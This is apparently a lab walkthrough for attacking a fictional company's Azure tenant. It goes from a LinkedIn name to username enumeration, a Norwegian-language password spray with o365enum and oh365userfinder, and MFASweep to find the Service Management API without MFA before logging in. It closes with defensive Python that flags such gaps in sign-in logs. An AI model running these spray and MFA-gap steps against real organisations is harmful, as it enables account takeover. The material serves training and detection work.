MFA Sweep Basics


Windows

Ingrid Johansen posted on LinkedIn that she started a new role with Mega Big Tech, working from their Norway office. After identifying her email address, we can attempt to gain access by trying passwords like Passord1! or Velkommen1 (as Azure by default only blocks common passwords in English).

python .\main.py -n "Ingrid Johansen" -d megabigtech.com

Next, we create a wordlist.

We then find that IJohansen@megabigtech.com is a valid email address:

python .\o365enum.py -u wordlist.txt -n 1 -m office.com

We create an email.txt file with the above valid email address

python .\oh365userfinder.py -p 'Velkommen1' --pwspray --elist email.txt

Import-Module .\MFASweep.ps1

Invoke-MFASweep

Y

Y

We can see that MFA is not enabled for the MS Service Management API.

az login

Input the credentials

az account show
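
From the defender's side, the gap MFASweep reports shows up in Entra ID sign-in logs as a password-only success on one resource while other resources challenge the same user for MFA. The added example below (not part of the original write-up or of MFASweep) flags that pattern; the rows are constructed, and the flattened field names (time, user, ip, resource, errorCode, authReq) are assumptions about how the logs were exported.

```python
from collections import defaultdict

INVALID_PASSWORD = 50126  # AADSTS50126: invalid username or password
MFA_REQUIRED = 50076      # AADSTS50076: MFA challenge required
SUCCESS = 0

# Constructed sample rows (not real log data); field names are assumptions.
FIELDS = ("time", "user", "ip", "resource", "errorCode", "authReq")
SFA, MFA = "singleFactorAuthentication", "multiFactorAuthentication"
ARM = "Windows Azure Service Management API"
ROWS = [
    ("2025-01-10T08:00:10Z", "alice@example.com", "203.0.113.7", "Microsoft Graph", 50126, SFA),
    ("2025-01-10T08:00:40Z", "alice@example.com", "203.0.113.7", "Microsoft Graph", 50126, SFA),
    ("2025-01-10T08:01:05Z", "alice@example.com", "203.0.113.7", "Microsoft Graph", 50076, MFA),
    ("2025-01-10T08:01:30Z", "alice@example.com", "203.0.113.7", ARM, 0, SFA),
    ("2025-01-10T09:15:00Z", "bob@example.com", "198.51.100.4", "Microsoft Graph", 0, MFA),
    ("2025-01-10T09:20:00Z", "carol@example.com", "198.51.100.9", "Microsoft Graph", 0, SFA),
]
SIGNINS = [dict(zip(FIELDS, row)) for row in ROWS]


def find_mfa_gaps(signins):
    """Flag password-only successes on a resource when the same user is
    challenged for MFA on other resources (uneven MFA coverage)."""
    mfa_seen = defaultdict(set)   # user -> resources that demanded MFA
    bad_pw = defaultdict(int)     # (user, ip) -> bad-password count so far
    sfa_ok = []                   # (record, bad passwords seen before it)
    for r in sorted(signins, key=lambda r: r["time"]):
        key = (r["user"], r["ip"])
        if r["errorCode"] == INVALID_PASSWORD:
            bad_pw[key] += 1
        elif r["errorCode"] == MFA_REQUIRED or r["authReq"] == MFA:
            mfa_seen[r["user"]].add(r["resource"])
        elif r["errorCode"] == SUCCESS:
            sfa_ok.append((r, bad_pw[key]))
    findings = []
    for r, prior in sfa_ok:
        elsewhere = sorted(mfa_seen[r["user"]] - {r["resource"]})
        if elsewhere:
            findings.append({"user": r["user"], "ip": r["ip"], "time": r["time"],
                             "resource": r["resource"], "prior_bad_passwords": prior,
                             "mfa_enforced_on": elsewhere})
    return findings


if __name__ == "__main__":
    for f in find_mfa_gaps(SIGNINS):
        print(f)
```

A finding with a non-zero prior_bad_passwords count from the same IP is the stronger signal; the fix for the gap itself is a Conditional Access policy that requires MFA for all resources rather than a selected few.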

© 2025 Cu3rv0x